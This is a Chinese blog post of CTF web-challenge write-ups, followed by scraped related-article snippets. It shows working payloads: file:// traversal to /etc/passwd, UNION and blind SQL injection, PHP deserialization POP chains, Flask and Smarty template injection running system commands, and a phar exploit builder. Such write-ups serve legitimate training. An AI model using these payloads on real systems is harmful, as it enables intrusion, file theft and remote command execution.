    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"
 
  前面看的不是很懂，只知道前面两个if不能是suctf.cc，然后经过encode('idna').decode('utf-8')要等于suctf.cc 
  大佬的脚本 
  from urllib.parse import urlparse,urlunsplit,urlsplit
from urllib import parse
def get_unicode():
    for x in range(65536):
        uni=chr(x)
        url="http://suctf.c{}".format(uni)
        try:
            if getUrl(url):
                print("str: "+uni+' unicode: \\u'+str(hex(x))[2:])
        except:
            pass
 
def getUrl(url):
    url=url
    host=parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return False
    parts=list(urlsplit(url))
    host=parts[1]
    if host == 'suctf.cc':
        return False
    newhost=[]
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1]='.'.join(newhost)
    finalUrl=urlunsplit(parts).split(' ')[0]
    host=parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return True
    else:
        return False
 
 
if __name__=='__main__':
    get_unicode()
 
  
 随便找个代替c就行，然后访问/etc/passwd发现成功 
  file://suctf.cⓒ/../../../../../etc/passwd
 
  然后联系题目，访问nginx的配置文件，目录为usr/local/nginx/conf/nginx.conf 
  file://suctf.cⓒ/../../../../../usr/local/nginx/conf/nginx.conf
 
  读取flag 
  file://suctf.cⓒ/../../../../../usr/fffffflag
 
   
  [安洵杯 2019]easy_serialize_php 
  source_code';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}
 
  看到题目将敏感字符串替换为空，肯定是反序列化字符串逃逸，唉，每次这种题目，我小小的脑瓜子不转个一两个小时根本构造不出来。
 先去phpinfo看一下
 
 看到extract($_POST)，意味着可以变量覆盖，可以传的参数_SESSION[user]，_SESSION[function]
 我们需要base64_decode($userinfo['img'])=d0g3_f1ag.php，也就是$userinfo['img']=ZDBnM19mMWFnLnBocA==，但没法控制img参数，所以要通过反序列化字符串逃逸来达到想要的结果。 
  class _SESSION{
    public $user = 'flagflagflagflagflagflag';
    public $function = 'x";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==';
}
$p=new _SESSION();
echo serialize($p);
$serialize_info = filter(serialize($p));
echo "\n";
echo $serialize_info;
 
  这样在经过替换后吃掉了function的值，成功将img的值修改成了ZDBnM19mMWFnLnBocA==，但此时只有两个参数，而题目有个，所以还要加一个 
  class _SESSION{
    public $user = 'flagflagflagflagflagflag';
    public $function = 'x";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"a";s:1:"a";}';
}
$p=new _SESSION();
echo serialize($p);
$serialize_info = filter(serialize($p));
echo "\n";
echo $serialize_info;
 
  _SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=x";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"a";s:1:"a";}
 
   
  _SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=x";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:1:"a";s:1:"a";}
 
  还要一种payload 
  _SESSION[flagphp]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
 
  这样序列化后经过替换结果为 
  "a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mbGxsbGxsYWc=";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}"
 
   
  [0CTF 2016]piapiapia 
  又是php反序列化字符串逃逸~
 开局一个登陆框，没有注入，尝试访问register.php，发现可以，注册后登陆，可以填写信息，查看信息。
 其实题目源码泄露，www.zip即可下载源码。
 审计后发现以下关键代码 
  //class.php
	public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string)
 
  //profile.php
$profile = unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));
 
  //update.php
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');
 
  我们的最终目的是要通过file_get_contents来读取config.php获得flag，而想让photo=config.php需要通过php反序列化字符串逃逸来完成。
 首先nickname的长度限制用数组绕过，然后需要逃逸的字符是";}s:5:"photo";s:10:"config.php";}(因为nickname为数组了，所以要加一个})，共34个，一个where替换成hacker会多出一个字符，也就是要34个where
  
  
 解密得到flag 
   
  [WesternCTF2018]shrine 
  import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{
    {% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)
 
  模板注入，注入点在/shrine/{ {}}
 config中应该有flag，但没法直接读取config
 可以先读取一波当前位置的全部全局变量 
  /shrine/{
    {url_for.__globals__}}
 
  发现有current_app
 
 查看current_app的config即可得到flag 
  /shrine/{
    {url_for.__globals__['current_app'].config}}
 
   
  [SWPU2019]Web1 
  sql注入，注入点在广告名处而不是id处，并且有22个字段。。。
 过滤了order by，可用group by代替 
  1'group/**/by/**/22,'1
 
  -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
 
  -1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
 
  过滤了information，参考这里，可以用sys.schema_auto_increment_columns来代替information_schema.tables，schema_table_statistics_with_buffer来代替information_schema.columns，但buu上不行，只能无列名注入
 不过mysql.innodb_table_stats倒是可以 
  -1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name='web1'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
 
  无列名注入如下图所示 
   
  查列得到flag 
  //将user表的原本的3列名字变成了1,2,3，将第3列别名为b，然后查询b列
-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
 
  这里有几列可以慢慢试过去，不对会报错，而flag在哪列同样一个个试过去 
   
  [WUSTCTF2020]朴实无华 
  robots.txt里看一下，果然有东西fAke_f1agggg.php，虽然是假的flag，但响应头暗藏玄机
  
   2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.
";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.
";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.
";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?> 
 
  第一层intval绕过很好绕，科学计数法就行 
  num=2010e2
 
  第二层有点难搞，因为是弱比较所以'0e12345'和'0e11111'这种是相等的，也就是要找一个0e开头的数，md5后也是0e开头。(我自己没搜到，太菜了。。。) 
  md5=0e215962017
 
  第三层就简单了，${IFS}代替空格，tac代替cat，直接读flag 
  get_flag=tac${IFS}f*
 
   
  [网鼎杯 2020 朱雀组]Nmap 
  又是nmap，跟之前[BUUCTF 2018]Online Tool这题很像，直接用那个payload试试看 
  '  -oG shell.php '
 
  发现过滤了php，改用短标签和phtml后缀 
  '  -oG shell.phtml '
 
  访问shell.phtml，发现成功写入，直接读flag
  
   
  [MRCTF2020]PYWebsite 
  打开网页源码发现flag.php，但没有flag
 尝试加个xff头 
  
 就这？ 
   
  [极客大挑战 2019]FinalSQL 
  根据题目，盲注没错了
 对照着写了个二分法的脚本 
  import requests
url = 'http://c4eb39fc-5e90-4165-9a11-5d9f7513cce5.node3.buuoj.cn/search.php'
flag = ''
payload = {
    'id':''
}

for i in range(1,300):
    left = 1
    right = 127
    mid=int((left+right)/2)
    while(left
 
  这题flag放的地方有点坑，不在Flaaaaag表中，而在F1naI1y表的password中，并且这个password的值还巨多，这我要是没用二分法估计得跑半小时。
  
   
  [NPUCTF2020]ReadlezPHP 
  ctrl+u发现time.php 
  a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);
 
  尝试反序列化命令执行，发现system被禁了，eval也不行，assert到是可以，查看phpinfo发现flag 
  ?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}
 
  感觉这题挺没意思的 
   
  [BJDCTF2020]EasySearch 
  源码泄露，index.php.swp 
  alert('[+] Welcome to manage system')";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            Hello,'.$_POST['username'].'
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "";
            
    }else
    {
	***
    }
	***

 
  首先需要password经过md5加密后前几位等于6d0bc1 
  import hashlib
for i in range(1,10000000000):
    password = hashlib.md5(str(i).encode('utf-8')).hexdigest()
    if password[0:6]=='6d0bc1':
        print(i)
        print(password)
        break
 
  password=2020666
 
  然后是SSI注入漏洞，这就涉及到我的知识盲区了
 服务器端包含注入SSI分析总结 
   
   SSI是英文"Server Side Includes"的缩写，翻译成中文就是服务器端包含的意思。
 SSI是嵌入HTML页面中的指令，在页面被提供时由服务器进行运算，以对现有HTML页面增加动态生成的内容，而无须通过CGI程序提供其整个页面，或者使用其他动态技术。
 从技术角度上来说，SSI就是在HTML文件中，可以通过注释行调用的命令或指针，即允许通过在HTML页面注入脚本或远程执行任意代码。 
   
  因为登入后抓包发现一个url，是shtml后缀，里面可能存在ssi指令，尝试ssi注入，注入点在username处
 使用exec指令，使用cmd作为参数执行服务器端命令：
 flag在上级目录 
  username=
 
  
 然后访问给的url就有flag 
   
  [MRCTF2020]Ezpop 
  append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."
";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}
 
  妈的，稍微难一点就屁都不会了，难顶~
 首先看一下要用到的魔术方法 
  __get() //用于从不可访问（或不存在）的属性读取数据
__invoke() //当尝试将对象调用为函数时触发
__toString() //把类当作字符串使用时触发
 
  例： 
  
//输出:你把对象当函数调用了！
 
  password;
?>
//输出:你在调用不可达的属性或不存在的属性！
 
  
//输出:你在把类当作字符串使用！
 
  回到题目
 我们最终是要利用include来读取flag，这需要触发__invoke来实现，也就是要将一个对象当函数调用，正好在Test类中的__get方法中有这么两行代码 
  public function __get($key){
        $function = $this->p;
        return $function();
    }
 
  那么只要$this->p=new Modifier()就能触发__invoke了
 而想要触发__get就要访问不可达或不存在的属性，又正好在Show类中的__toString方法有这么一行 
  public function __toString(){
        return $this->str->source;
    }
 
  只要$this->str=new Test()，而Test类中没有source属性，这样就能触发__get了
 那要怎么触发__toString呢？Show还有这么两行 
  public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."
";
    }
 
  也就是只要$this->source=new Show()就能触发__toString了 
  注意，因为Modifier类中有protected属性，序列化后有不可见字符%00，提交时要手动加上，或者直接把最终payload进行url编码 
  append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."
";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

$a = new Test();
$a->p = new Modifier();
//触发__invoke

$b = new Show();
$b->str = $a;
//触发__get

$c = new Show();
$c->source = $b;
//触发__toString
echo urlencode(serialize($c));
?>
 
  ?pop=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A9%3A%22index.php%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
 
  由MRCTF2020学习反序列化POP链 
   
  [NCTF2019]True XML cookbook 
  首先跟之前那题一样，可以任意文件读取，但没有flag,可以php伪协议读取doLogin.php，但没啥用 
  
 ]>
&goodies;123456
 
  接下来需要的是xxe打内网
 要读取/etc/host,查看存活主机
 然后
 
 ???为什么跟wp不一样，ip地址呢？
 其实还有一个关键文件，/proc/net/arp 
  
 (可能我后面爆破的原因，有这么多ip，一开始就一个10.0.212.28.xx，忘了是哪个。。。)
 然后爆破c端，找到flag，在10.0.212.11 
   
  没搞懂/etc/host和/proc/net/arp的区别，希望有大佬能解答一下~ 
   
  [GYCTF2020]FlaskApp 
  结合题目，测试后发现在解密处存在ssti，
 简单fuzz后发现过滤了flag,os,eval
 可以用如下命令读取app.py 
  {
    {url_for.__globals__.__builtins__.open('app.py').read()}}
 
  发现黑名单 
  black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"] 
 
  可以字符串拼接来绕过 
  {
    {url_for.__globals__['o'+'s']['pop'+'en']('ls /').read()}}
e3t1cmxfZm9yLl9fZ2xvYmFsc19fWydvJysncyddWydwb3AnKydlbiddKCdscyAvJykucmVhZCgpfX0=
 
  找到flag 
   
  读取flag 
  {
    {url_for.__globals__['o'+'s']['pop'+'en']('cat /this_is_the_fla'+'g.txt').read()}}
e3t1cmxfZm9yLl9fZ2xvYmFsc19fWydvJysncyddWydwb3AnKydlbiddKCdjYXQgL3RoaXNfaXNfdGhlX2ZsYScrJ2cudHh0JykucmVhZCgpfX0=
 
   
   
  [CISCN2019 华北赛区 Day1 Web2]ikun(不会) 
  题目要求买lv6，翻了几页没看见，写个脚本跑一下 
  import requests
url = 'http://afdaf66c-c95a-4d7f-80da-6d149e896787.node3.buuoj.cn/shop'
payload = {
    'page' : 1
}
for i in range(1,200):
    payload['page'] = i
    r = requests.get(url,params=payload)
    if 'lv6.png' in r.text:
        print(i)
        break
 
  最终发现在181页，但发现钱不够，抓包将折扣改成0.000000008
 然后提示要admin，再仔细看了下，http头中有jwt，放到这个网站看一下，是hs256加密，用c-jwt-cracker破解key 
   
  构造jwt
 
 替换jwt后发现成功成为admin，在网页源码中发现www.zip，下载
 然后就是python反序列化，没接触过，研究完后再回来做~ 
   
  [CISCN2019 华东南赛区]Web11 
  题目页面中的Build With Smarty是重点，说明用了smarty模板，猜测是模板注入
 题目会检测ip，加个xff头发现注入点在xff头 
  
 没接触过smarty，搜一下语法，发现可以执行php函数
 smarty中调用php内置函数 
  读取flag 
  X-Forwarded-For: {'cat /flag'|system}
 
   
  看到别的师傅写的一些smarty常用payload 
  {if phpinfo()}{/if}
{if system('ls')}{/if}
{ readfile('/flag') }
{if show_source('/flag')}{/if}
{if system('cat ../../../flag')}{/if} 
 
   
  [CISCN2019 华北赛区 Day1 Web1]Dropbox 
  登陆后随便上传一个图片，发现可以下载和删除，猜测可以任意文件下载
 抓包，filename改为/etc/passwd
 但没法下载其他文件，看wp才知道要chdir() 现实目录跳跃filename=../../index.php
 可以下载class.php,delete.php,download.php,index.php,upload.php
 不过有用的就class.php和delete.php 
  //class.php
db = $db;
    }

    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }

    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }

    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }

    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);

        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);

        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        $table = '';
        $table .= '';
        foreach ($this->funcs as $func) {
            $table .= '';
        }
        $table .= '';
        $table .= '';
        foreach ($this->results as $filename => $result) {
            $table .= '';
            foreach ($result as $func => $value) {
                $table .= '';
            }
            $table .= '';
            $table .= '';
        }
        echo $table;
    }
}

class File {
    public $filename;

    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }

    public function name() {
        return basename($this->filename);
    }

    public function size() {
        $size = filesize($this->filename);
        $units = array(' B', ' KB', ' MB', ' GB', ' TB');
        for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
        return round($size, 2).$units[$i];
    }

    public function detele() {
        unlink($this->filename);
    }

    public function close() {
        return file_get_contents($this->filename);
    }
}
?>
//delete.php
open($filename)) {
    $file->detele();
    Header("Content-type: application/json");
    $response = array("success" => true, "error" => "");
    echo json_encode($response);
} else {
    Header("Content-type: application/json");
    $response = array("success" => false, "error" => "File not exist");
    echo json_encode($response);
}
?>
有几个关键点
User类中
public function __destruct() {
        $this->db->close();
File类中
public function close() {
        return file_get_contents($this->filename);
FileList类中
public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }
 
   __call:会在对象调用不存在的方法时，自动执行，第一个参数为调用的方法名 
  
所以思路为:当db的值为FileList的一个对象时，执行close()方法，但FileList中没有close()，于是触发__call(‘close()’)方法，使得$file->close()，进而$results=file_get_contents($filename)，最终FileList->__destruct()输出$result
 payload
files = array(new File());
    }
}
$a = new User();
$b = new FileList();
$a->db = $b;
$phar = new Phar('phar.phar');
$phar->startBuffering();
$phar->setStub('');
$phar->setMetadata($a);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>
上传时将类型为image/gif，然后删除时filename=phar://phar.gif

 其实做完了还是不太懂，再也不想看到php了。。。
 多放几篇wp
 https://www.jianshu.com/p/5b91e0b7f3ac
 https://blog.csdn.net/weixin_44077544/article/details/102844554
 https://blog.csdn.net/weixin_43345082/article/details/100102082
[BSidesCF 2019]Futurella
查看网页源码就有flag
 我直接黑人问号？？？
[GWCTF 2019]枯燥的抽奖(打不开)
题目容器新建不了，以后再说
[MRCTF2020]套娃

                    
                    
                    
                    
                
                
                    
                        
                        
                             
                        
                        
                        
                            
                        
                        
                        
                            
                        
                    
                
            
        
    
    
        你可能感兴趣的:(web,安全)
        
            
                
                    微服务下功能权限与数据权限的设计与实现
                        nbsaas-boot
微服务java架构
                        在微服务架构下，系统的功能权限和数据权限控制显得尤为重要。随着系统规模的扩大和微服务数量的增加，如何保证不同用户和服务之间的访问权限准确、细粒度地控制，成为设计安全策略的关键。本文将讨论如何在微服务体系中设计和实现功能权限与数据权限控制。1.功能权限与数据权限的定义功能权限：指用户或系统角色对特定功能的访问权限。通常是某个用户角色能否执行某个操作，比如查看订单、创建订单、修改用户资料等。数据权限：
                    
                    理解Gunicorn：Python WSGI服务器的基石
                        范范0825
ipythonlinux运维
                        理解Gunicorn：PythonWSGI服务器的基石介绍Gunicorn，全称GreenUnicorn，是一个为PythonWSGI（WebServerGatewayInterface）应用设计的高效、轻量级HTTP服务器。作为PythonWeb应用部署的常用工具，Gunicorn以其高性能和易用性著称。本文将介绍Gunicorn的基本概念、安装和配置，帮助初学者快速上手。1.什么是Gunico
                    
                    c++ 的iostream 和 c++的stdio的区别和联系
                        黄卷青灯77
c++算法开发语言iostreamstdio
                        在C++中，iostream和C语言的stdio.h都是用于处理输入输出的库，但它们在设计、用法和功能上有许多不同。以下是两者的区别和联系：区别1.编程风格iostream（C++风格）：C++标准库中的输入输出流类库，支持面向对象的输入输出操作。典型用法是cin（输入）和cout（输出），使用>操作符来处理数据。更加类型安全，支持用户自定义类型的输入输出。#includeintmain(){in
                    
                    Long类型前后端数据不一致
                        igotyback
前端
                        响应给前端的数据浏览器控制台中response中看到的Long类型的数据是正常的到前端数据不一致前后端数据类型不匹配是一个常见问题，尤其是当后端使用Java的Long类型（64位）与前端JavaScript的Number类型（最大安全整数为2^53-1，即16位）进行数据交互时，很容易出现精度丢失的问题。这是因为JavaScript中的Number类型无法安全地表示超过16位的整数。为了解决这个问
                    
                    Google earth studio 简介
                        陟彼高冈yu
旅游
                        GoogleEarthStudio是一个基于Web的动画工具，专为创作使用GoogleEarth数据的动画和视频而设计。它利用了GoogleEarth强大的三维地图和卫星影像数据库，使用户能够轻松地创建逼真的地球动画、航拍视频和动态地图可视化。网址为https://www.google.com/earth/studio/。GoogleEarthStudio是一个基于Web的动画工具，专为创作使用G
                    
                    PHP环境搭建详细教程
                        好看资源平台
前端php
                        PHP是一个流行的服务器端脚本语言，广泛用于Web开发。为了使PHP能够在本地或服务器上运行，我们需要搭建一个合适的PHP环境。本教程将结合最新资料，介绍在不同操作系统上搭建PHP开发环境的多种方法，包括Windows、macOS和Linux系统的安装步骤，以及本地和Docker环境的配置。1.PHP环境搭建概述PHP环境的搭建主要分为以下几类：集成开发环境：例如XAMPP、WAMP、MAMP，这
                    
                    DIV+CSS+JavaScript技术制作网页（旅游主题网页设计与制作）云南大理
                        STU学生网页设计
网页设计期末网页作业html静态网页html5期末大作业网页设计web大作业
                        ️精彩专栏推荐作者主页:【进入主页—获取更多源码】web前端期末大作业：【HTML5网页期末作业(1000套)】程序员有趣的告白方式：【HTML七夕情人节表白网页制作(110套)】文章目录二、网站介绍三、网站效果▶️1.视频演示2.图片演示四、网站代码HTML结构代码CSS样式代码五、更多源码二、网站介绍网站布局方面：计划采用目前主流的、能兼容各大主流浏览器、显示效果稳定的浮动网页布局结构。网站程
                    
                    特殊的拜年
                        飘雪的天堂

                        文/雪儿大年初一，家家户户没有了轰响的鞭炮声，大街上没有了人流涌动的喧闹，几乎看不到人影，变得冷冷清清。天刚亮不大会儿，村里的大喇叭响了起来：由于当前正值疾病高发期，流感流行的高峰期。同时，新型冠状病毒感染的肺炎进入第二波流行的上升期。为了自己和他人的健康安全着想，请大家尽量不要串门拜年，不要在街里走动。可以通过手机微信，视频，电话，信息拜年……今年的春节真是特别。禁止燃放鞭炮，烟花爆竹，禁止出村
                    
                    关于城市旅游的HTML网页设计——(旅游风景云南 5页)HTML+CSS+JavaScript
                        二挡起步
web前端期末大作业javascripthtmlcss旅游风景
                        ⛵源码获取文末联系✈Web前端开发技术描述网页设计题材，DIV+CSS布局制作,HTML+CSS网页设计期末课程大作业|游景点介绍|旅游风景区|家乡介绍|等网站的设计与制作|HTML期末大学生网页设计作业，Web大学生网页HTML：结构CSS：样式在操作方面上运用了html5和css3，采用了div+css结构、表单、超链接、浮动、绝对定位、相对定位、字体样式、引用视频等基础知识JavaScrip
                    
                    HTML网页设计制作大作业（div+css） 云南我的家乡旅游景点 带文字滚动
                        二挡起步
web前端期末大作业web设计网页规划与设计htmlcssjavascriptdreamweaver前端
                        Web前端开发技术描述网页设计题材，DIV+CSS布局制作,HTML+CSS网页设计期末课程大作业游景点介绍|旅游风景区|家乡介绍|等网站的设计与制作HTML期末大学生网页设计作业HTML：结构CSS：样式在操作方面上运用了html5和css3，采用了div+css结构、表单、超链接、浮动、绝对定位、相对定位、字体样式、引用视频等基础知识JavaScript：做与用户的交互行为文章目录前端学习路线
                    
                    git - Webhook让部署自动化
                        大猪大猪

                        我们现在有一个需求，将项目打包上传到gitlab或者github后，程序能自动部署，不用手动地去服务器中进行项目更新并运行，如何做到？这里我们可以使用gitlab与github的挂钩，挂钩的原理就是，每当我们有请求到gitlab与github服务器时，这时他俩会根据我们配置的挂钩地扯进行访问，webhook挂钩程序会一直监听着某个端口请求，一但收到他们发过来的请求，这时就知道用户有请求提交了，这时
                    
                    webpack图片等资源的处理
                        dmengmeng

                        需要的loaderfile-loader（让我们可以引入这些资源文件）url-loader（其实是file-loader的二次封装）img-loader（处理图片所需要的）在没有使用任何处理图片的loader之前，比如说css中用到了背景图片，那么最后打包会报错的，因为他没办法处理图片。其实你只想能够使用图片的话。只加一个file-loader就可以，打开网页能准确看到图片。{test:/\.(p
                    
                    【华为OD技术面试真题 - 技术面】-测试八股文真题题库（1）
                        算法大师
华为od面试python算法前端
                        华为OD面试真题精选专栏：华为OD面试真题精选目录:2024华为OD面试手撕代码真题目录以及八股文真题目录文章目录华为OD面试真题精选1.黑盒测试和白盒测试的区别2.假设我们公司现在开发一个类似于微信的软件1.0版本，现在要你测试这个功能：打开聊天窗口，输入文本，限制字数在200字以内。问你怎么提取测试点。功能测试性能测试安全性测试可用性测试跨平台兼容性测试网络环境测试3.接口测试的工具你了解哪些
                    
                    直返的东西正品吗?直返APP安全吗?直返是正规平台吗?
                        氧惠购物达人

                        亲们，你们是不是经常在直返APP上买东西呀？但是，你们有没有想过，里面的东西到底是不是正品呢？这个APP安全吗？它是不是一个正规的平台呀？别着急，今天我就来给大家揭秘一下！氧惠APP（带货领导者）——是与以往完全不同的抖客+淘客app！2023全新模式，我的直推也会放到你下面。主打：带货高补贴，深受各位带货团队长喜爱（每天出单带货几十万单）。注册即可享受高补贴+0撸+捡漏等带货新体验。送万元推广大
                    
                    EIO国际确定性的交易（3/10）资管 ， 资金委托安全吗？
                        古城鹏哥

                        大家可能都知道资金托管，账户是自己开，钱在自己的账户上，密码是由自己掌控，别人提不走你账户的资金，每天可以看下到自己的账户，也可以看到交易流水。现金只能提到自己的银行卡中。账户由技术人员或操作人员，或者是机构团队帮你操作账户，产生盈利和收入，以获得的利润来分配盈利，技术强硬和做的时间久了过硬技术团队，会保证你的资金本金，不会让你的本金亏损的按照一定比例分配收入。所以在这个过程当中一定要看清楚技术的
                    
                    TDengine 签约前晨汽车，解锁智能出行的无限潜力
                        涛思数据（TDengine）
tdengine汽车大数据
                        在全球汽车产业转型升级的背景下，智能网联和新能源技术正迅速成为商用车行业的重要发展方向。随着市场对环保和智能化需求的日益增强，企业必须在技术创新和数据管理上不断突破，以满足客户对高效、安全和智能出行的期待。在这一背景下，前晨汽车凭借其在新能源智能商用车领域的前瞻性布局和技术实力，成为行业中的佼佼者。前晨汽车采用整车数据采集和全车数据打通策略，能够实时将数据推送至APP端客户。然而，这导致整体写入和
                    
                    “这才好”麻辣香锅 能够增加人身体的免疫能力
                        小补文知

